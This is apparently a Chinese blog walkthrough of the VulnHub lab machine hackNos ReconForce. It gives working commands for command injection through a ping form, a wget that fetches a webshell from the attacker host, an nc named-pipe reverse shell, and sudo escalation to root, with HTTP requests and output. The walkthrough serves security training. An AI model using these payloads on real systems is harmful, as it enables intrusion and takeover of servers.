HACKNOS:RECONFORCE(V1.1)

作者：手机用户2502913993 | 来源：互联网 | 2023-07-07 10:49

HACKNOS:RECONFORCE(V1.1)目录HACKNOS:RECONFORCE(V1.1)1信息收集1.1端口扫描1.2ftp分析1.3后台目录扫描1.2.1目录分析2W

HACKNOS: RECONFORCE (V1.1)
目录
HACKNOS: RECONFORCE (V1.1)
1 信息收集
1.1 端口扫描
1.2 ftp分析
1.3 后台目录扫描
1.2.1 目录分析
2 Web-Shell利用
2.1 尝试命令执行
2.2 反弹Shell
2.4 切换python Shell
3 提权
3.1 收集当前系统信息
3.2 切换用户
3.3 收集recon信息
3.4 sudo 提权

下载地址：hackNos: ReconForce (v1.1) ~ VulnHub

1 信息收集

1.1 端口扫描

$ nmap -A -p - -T4 192.168.56.104 -oA RECONFORCE Nmap scan report for 192.168.56.104 Host is up (0.00080s latency). Not shown: 65532 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.0.8 or later |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:192.168.56.102 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 2 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 6f:96:94:65:72:80:08:93:23:90:20:bc:76:df:b8:ec (RSA) | 256 6f:bb:49:1a:a9:b6:e5:00:84:19:a0:e4:2b:c4:57:c4 (ECDSA) |_ 256 ce:3d:94:05:f4:a6:82:c4:7f:3f:ba:37:1d:f6:23:b0 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Recon_Web |_http-server-header: Apache/2.4.41 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1.2 ftp分析

# ftp目录下没有东东 $ ftp Anonymous@192.168.56.104 Connected to 192.168.56.104. 220 "Security@hackNos". 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -la 229 Entering Extended Passive Mode (|||38126|) 150 Here comes the directory listing. drwxr-xr-x 2 0 117 4096 Jan 06 2020 . drwxr-xr-x 2 0 117 4096 Jan 06 2020 .. 226 Directory send OK.

1.3 后台目录扫描

$ dirsearch -u http://192.168.56.104/ Target: http://192.168.56.104/ [11:16:55] Starting: [11:17:07] 301 - 314B - /css -> http://192.168.56.104/css/ [11:17:10] 200 - 660B - /index.html Task Completed

1.2.1 目录分析

http://192.168.56.104/5ecure/存在基础认证。

结合ftp所给的提示，尝试使用admin:Security@hackNos登录，成功认证。

尝试输入127.0.0.1执行ping操作

2 Web-Shell利用

2.1 尝试命令执行

在http://192.168.56.104/5ecure/认证后的页面中，利用BurpSuite测试命令注入
POST /5ecure/out.php HTTP/1.1 Host: 192.168.56.104 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 32 Origin: http://192.168.56.104 Authorization: Basic YWRtaW46U2VjdXJpdHlAaGFja05vcw== Connection: close Referer: http://192.168.56.104/5ecure/ Upgrade-Insecure-Requests: 1 DNT: 1 Sec-GPC: 1 ip=127.0.0.1|id&Submit=Ping_Scan
- 成功实现命令注入：
  HTTP/1.1 200 OK Date: Mon, 04 Apr 2022 11:44:15 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 67 Connection: close Content-Type: text/html; charset=UTF-8
  uid=33(www-data) gid=33(www-data) groups=33(www-data)

查看当前目录下的文件
// 命令： ip=127.0.0.1|ls&Submit=Ping_Scan //当前目录下的文件 css index.html logo.png out.php

查看out.php源码，可知当使用|cmd时可以绕过限制
# 命令： ip=127.0.0.1|cat+out.php&Submit=Ping_Scan # `out.php`源码 if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = trim($_REQUEST[ 'ip' ]); // Set blacklist $substitutiOns= array( '&' => '', ';' => '', '| ' => '', '-' => '', '$' => '', '(' => '', ')' => '', '`' => '', '||' => '', ); // Remove any of the charactars in the array (blacklist). $target = str_replace( array_keys( $substitutions ), $substitutions, $target ); // Determine OS and execute the ping command. if( stristr( php_uname( 's' ), 'Windows NT' ) ) { // Windows $cmd = shell_exec( 'ping ' . $target ); } else { // *nix $cmd = shell_exec( 'ping -c 4 ' . $target ); } // Feedback for the end user echo "
{$cmd}"; } ?>

2.2 反弹Shell

在目标系统中，利用命令注入下载一句话木马
# 下载一句话木马 ip=127.0.0.1|wget+"http://192.168.56.1/webshell.php"&Submit=Ping_Scan #查看所下载的一句话木马 ip=127.0.0.1|cat+webshell.php&Submit=Ping_Scan # 回显结果

构造如下请求反弹shell
POST /5ecure/webshell.php HTTP/1.1 Host: 192.168.56.104 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Authorization: Basic YWRtaW46U2VjdXJpdHlAaGFja05vcw== Connection: close Upgrade-Insecure-Requests: 1 DNT: 1 Sec-GPC: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 120 acmd=rm+/tmp/getshell%3bmkfifo+/tmp/getshell%3bcat+/tmp/getshell|/bin/sh+-i+2>%261|nc+192.168.56.102+2333+>/tmp/getshell

成功反弹shell
$ nc -nvlp 2333 listening on [any] 2333 ... connect to [192.168.56.102] from (UNKNOWN) [192.168.56.104] 36560 /bin/sh: 0: can't access tty; job control turned off $ python3 -c "import pty;pty.spawn('/bin/bash')" www-data@hacknos:/var/www/recon/5ecu

2.4 切换python Shell

python3 -c "import pty;pty.spawn('/bin/bash')"

3 提权

3.1 收集当前系统信息

查看当前系统的cap权限设置
www-data@hacknos:/tmp$ getcap -r / 2>/dev/null /usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep /usr/bin/mtr-packet = cap_net_raw+ep /usr/bin/ping = cap_net_raw+ep /usr/bin/traceroute6.iputils = cap_net_raw+ep

3.2 切换用户

查找半天也没有什么思路，突然想到，是否可以使用ftp提示的密码登录recon账户呢？
www-data@hacknos:/var/www/recon/5ecure$ su - recon Password: Security@hackNos recon@hacknos:~$ id uid=1000(recon) gid=119(docker) groups=119(docker),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lxd)

3.3 收集recon信息

得到recon用户的flag
recon@hacknos:~$ cat user cat user.txt ########################################### MD5HASH: bae11ce4f67af91fa58576c1da2aad4b

查看sudo权限：拥有所有权限
recon@hacknos:~$ sudo -l [sudo] password for recon: Security@hackNos Matching Defaults entries for recon on hacknos: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User recon may run the following commands on hacknos: (ALL : ALL) ALL

3.4 sudo 提权

recon@hacknos:~$ sudo -i root@hacknos:~# cat root.txt $$\ $$$$$$$\ \$$\ $$ __$$\ $$$$\ \$$\ $$ | $$ | $$$$$$\ $$$$$$$\ $$$$$$\ $$$$$$$\ \____| \$$\ $$$$$$$ |$$ __$$\ $$ _____|$$ __$$\ $$ __$$\ $$$$\ $$ | $$ __$$<$$$$$$$$ |$$ / $$ / $$ |$$ | $$ | \____|$$ / $$ | $$ |$$ ____|$$ | $$ | $$ |$$ | $$ | $$ / $$ | $$ |\$$$$$$$\ \$$$$$$$\ \$$$$$$ |$$ | $$ | \__/ \__| \__| \_______| \_______| \______/ \__| \__| MD5HASH: bae11ce4f67af91fa58576c1da2aad4b Author: Rahul Gehlaut WebBlog: www.hackNos.com Twitter: @rahul_gehlaut

推荐阅读

bash
在Ubuntu系统中配置Python环境变量的方法与技巧

在Ubuntu系统中配置Python环境变量是确保项目顺利运行的关键步骤。本文介绍了如何将Windows上的Django项目迁移到Ubuntu，并解决因虚拟环境导致的模块缺失问题。通过详细的操作指南，帮助读者正确配置虚拟环境，确保所有第三方库都能被正确识别和使用。此外，还提供了一些实用的技巧，如如何检查环境变量配置是否正确，以及如何在多个虚拟环境之间切换。 ... [详细]

蜡笔小新 2024-11-05 21:42:25
bash
CLIfe：我的高效开发环境配置

在开发过程中，我最初也依赖于功能全面但操作繁琐的集成开发环境（IDE），如Borland Delphi 和 Microsoft Visual Studio。然而，随着对高效开发的追求，我逐渐转向了更加轻量级和灵活的工具组合。通过 CLIfe，我构建了一个高度定制化的开发环境，不仅提高了代码编写效率，还简化了项目管理流程。这一配置结合了多种强大的命令行工具和插件，使我在日常开发中能够更加得心应手。 ... [详细]

蜡笔小新 2024-11-07 18:32:20
select
分布式开源任务调度框架 TBSchedule 深度解析与应用实践

本文深入解析了分布式开源任务调度框架 TBSchedule 的核心原理与应用场景，并通过实际案例详细介绍了其部署与使用方法。首先，从源码下载开始，详细阐述了 TBSchedule 的安装步骤和配置要点。接着，探讨了该框架在大规模分布式环境中的性能优化策略，以及如何通过灵活的任务调度机制提升系统效率。最后，结合具体实例，展示了 TBSchedule 在实际项目中的应用效果，为开发者提供了宝贵的实践经验。 ... [详细]

蜡笔小新 2024-11-02 11:59:52
import
如何在Nginx服务器上轻松配置CertBot以实现SSL证书自动化管理

为了确保iOS应用能够安全地访问网站数据，本文介绍了如何在Nginx服务器上轻松配置CertBot以实现SSL证书的自动化管理。通过这一过程，可以确保应用始终使用HTTPS协议，从而提升数据传输的安全性和可靠性。文章详细阐述了配置步骤和常见问题的解决方法，帮助读者快速上手并成功部署SSL证书。 ... [详细]

蜡笔小新 2024-11-10 08:42:08
uri
艾伟深入解析：WCF Binding模型中的绑定元素详解

本文深入解析了WCF Binding模型中的绑定元素，详细介绍了信道、信道管理器、信道监听器和信道工厂的概念与作用。从对象创建的角度来看，信道管理器负责信道的生成。具体而言，客户端的信道通过信道工厂进行实例化，而服务端则通过信道监听器来接收请求。文章还探讨了这些组件之间的交互机制及其在WCF通信中的重要性。 ... [详细]

蜡笔小新 2024-11-09 17:13:19
go
Python 伦理黑客技术：深入探讨后门攻击（第三部分）

在《Python 伦理黑客技术：深入探讨后门攻击（第三部分）》中，作者详细分析了后门攻击中的Socket问题。由于TCP协议基于流，难以确定消息批次的结束点，这给后门攻击的实现带来了挑战。为了解决这一问题，文章提出了一系列有效的技术方案，包括使用特定的分隔符和长度前缀，以确保数据包的准确传输和解析。这些方法不仅提高了攻击的隐蔽性和可靠性，还为安全研究人员提供了宝贵的参考。 ... [详细]

蜡笔小新 2024-11-09 16:33:02
string
在CentOS系统下详细解析阿里云ECS服务器上搭建LAMP环境的配置步骤

本文详细介绍了在CentOS 6.5 64位系统上使用阿里云ECS服务器搭建LAMP环境的具体步骤。首先，通过PuTTY工具实现远程连接至服务器。接着，检查当前系统的磁盘空间使用情况，确保有足够的空间进行后续操作，可使用 `df` 命令进行查看。此外，文章还涵盖了安装和配置Apache、MySQL和PHP的相关步骤，以及常见问题的解决方法，帮助用户顺利完成LAMP环境的搭建。 ... [详细]

蜡笔小新 2024-11-09 15:09:47
text
深入解析 jQuery 中 ajaxSubmit 方法的使用技巧与应用场景

本文详细探讨了 jQuery 中 `ajaxSubmit` 方法的使用技巧及其应用场景。首先，介绍了如何正确引入必要的脚本文件，如 `jquery.form.js` 和 `jquery-1.8.0.min.js`。接着，通过具体示例展示了如何利用 `ajaxSubmit` 方法实现表单的异步提交，包括数据的发送、接收和处理。此外，还讨论了该方法在不同场景下的应用，如文件上传、表单验证和动态更新页面内容等，提供了丰富的代码示例和最佳实践建议。 ... [详细]

蜡笔小新 2024-11-07 19:38:19
uri
SQL Server 连接故障总结与解决方案分析

在使用 SQL Server 时，连接故障是用户最常见的问题之一。通常，连接 SQL Server 的方法有两种：一种是通过 SQL Server 自带的客户端工具，例如 SQL Server Management Studio；另一种是通过第三方应用程序或开发工具进行连接。本文将详细分析导致连接故障的常见原因，并提供相应的解决策略，帮助用户有效排除连接问题。 ... [详细]

蜡笔小新 2024-11-07 08:30:13
go
动态壁纸 LiveWallPaper：让您的桌面栩栩如生（第二篇）

在本文中，我们将继续探讨如何开发动态壁纸 LiveWallPaper，使您的桌面更加生动有趣。作为 2010 年 Google 暑期大学生博客分享大赛 Android 篇的一部分，我们将详细介绍 Ed Burnette 的《Hello, Android》第三版中的相关内容，并分享一些实用的开发技巧和经验。通过本篇文章，您将了解到如何利用 Android SDK 创建引人入胜的动态壁纸，提升用户体验。 ... [详细]

蜡笔小新 2024-11-06 02:00:32
import
Python爬虫入门：深入解析HTTP协议与Requests库的应用

Python爬虫入门：深入解析HTTP协议与Requests库的应用 ... [详细]

蜡笔小新 2024-11-03 15:17:58
bash
技术日志：Ansible的安装及模块管理详解

技术日志：Ansible的安装及模块管理详解 ... [详细]

蜡笔小新 2024-11-03 15:01:47
import
在 PySimpleGUI 中实现异步功能的详细指南

在 PySimpleGUI 中实现异步功能的详细指南 ... [详细]

蜡笔小新 2024-11-02 01:41:03
text
从零开始使用Python Flask构建鱼书应用：高级编程指南

本课程详细介绍了如何使用Python Flask框架从零开始构建鱼书应用，涵盖高级编程技巧和实战项目。通过视频教学，学员将学习到Flask的高效用法，包括数据库事务处理和书籍交易模型的实现。特别感谢AI资源网提供的课程下载支持。 ... [详细]

蜡笔小新 2024-10-31 08:56:47
text
深入解析JVM参数配置与优化策略

本文深入探讨了JVM参数配置与优化策略，通过分析不同机器配置下的性能需求，提供了详细的JVM参数推荐方案。结合实际案例，文章阐述了如何通过合理的参数调整，提升Java应用的运行效率和稳定性，为企业在高性能计算环境中实现最优资源配置提供了 valuable 的参考。 ... [详细]

蜡笔小新 2024-10-31 08:25:12

手机用户2502913993

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章